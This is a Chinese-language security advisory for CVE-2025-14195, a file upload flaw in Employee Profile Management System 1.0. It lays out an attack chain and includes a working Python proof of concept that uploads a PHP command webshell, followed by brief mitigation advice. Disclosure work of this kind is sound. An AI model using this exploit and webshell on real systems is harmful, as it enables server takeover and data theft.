CVE-2025-14195 Employee Profile Management System 1.0 无限制文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-14195

漏洞类型

无限制文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Employee Profile Management System 1.0

漏洞概述

CVE-2025-14195是code-projects Employee Profile Management System 1.0版本中的一个安全漏洞。该漏洞存在于/profiling/add_file_query.php文件中，由于对用户上传的文件缺乏有效的验证和过滤，攻击者可以通过per_file参数上传任意文件类型，包括恶意脚本文件（如PHP webshell）。由于该漏洞可远程利用，且只需要低权限认证，攻击门槛较低。漏洞已于2025年12月7日披露，相关的利用代码已公开，可能导致服务器被完全控制，进而造成数据泄露或进一步的内网渗透。

技术细节

漏洞存在于Employee Profile Management System的/profiling/add_file_query.php文件中的文件上传功能。攻击者通过构造恶意请求，将per_file参数设置为包含恶意代码的文件（通常是PHP脚本），系统未对上传文件的类型、内容和扩展名进行严格验证就直接保存到服务器。由于文件上传目录通常具有执行权限，攻击者可以直接访问上传的恶意文件实现远程代码执行。攻击者可以利用webshell获取服务器命令行权限，读取敏感配置文件，甚至横向移动到内网其他系统。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L，表明攻击复杂度低且无需用户交互。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用Employee Profile Management System 1.0，定位到/profiling/add_file_query.php文件上传接口

STEP 2

步骤2: 构造恶意文件

攻击者创建包含PHP webshell的恶意文件，用于执行系统命令

STEP 3

步骤3: 文件上传

攻击者通过per_file参数上传恶意PHP文件，系统未进行文件类型验证直接保存

STEP 4

步骤4: webshell激活

攻击者访问上传的恶意文件，通过HTTP请求传递cmd参数执行任意系统命令

STEP 5

步骤5: 权限提升与持久化

获取服务器访问权限后，攻击者可读取配置文件、数据库凭据，并可能部署后门程序实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14195 PoC - Unrestricted File Upload in Employee Profile Management System 1.0
# Target: /profiling/add_file_query.php

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
upload_endpoint = f"{target_url}/profiling/add_file_query.php"

# Create malicious PHP file for webshell
php_payload = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?>"

files = {
    'per_file': ('shell.php', php_payload, 'application/x-httpd-php')
}

try:
    response = requests.post(upload_endpoint, files=files, timeout=10)
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    # If upload successful, try to access the shell
    if response.status_code == 200:
        shell_url = f"{target_url}/uploads/shell.php"
        print(f"[*] Shell uploaded at: {shell_url}")
        print(f"[*] Execute command: ?cmd=whoami")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Employee Profile Management System 1.0

防御指南

临时缓解措施

立即限制/profiling/add_file_query.php的访问权限，或暂时禁用该功能。同时配置Web服务器（如Apache/Nginx）禁止上传目录中的脚本执行，并对所有上传文件进行病毒扫描。考虑部署Web应用防火墙（WAF）规则拦截异常文件上传请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14195
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14195
3 Details https://www.cvedetails.com/cve/CVE-2025-14195/
4 VulDB https://vuldb.com/cve/CVE-2025-14195
5 Link https://code-projects.org/
6 Link https://github.com/shenxianyuguitian/employee-management-UFU
7 Link https://vuldb.com/?ctiid.334615
8 Link https://vuldb.com/?id.334615
9 Link https://vuldb.com/?submit.699247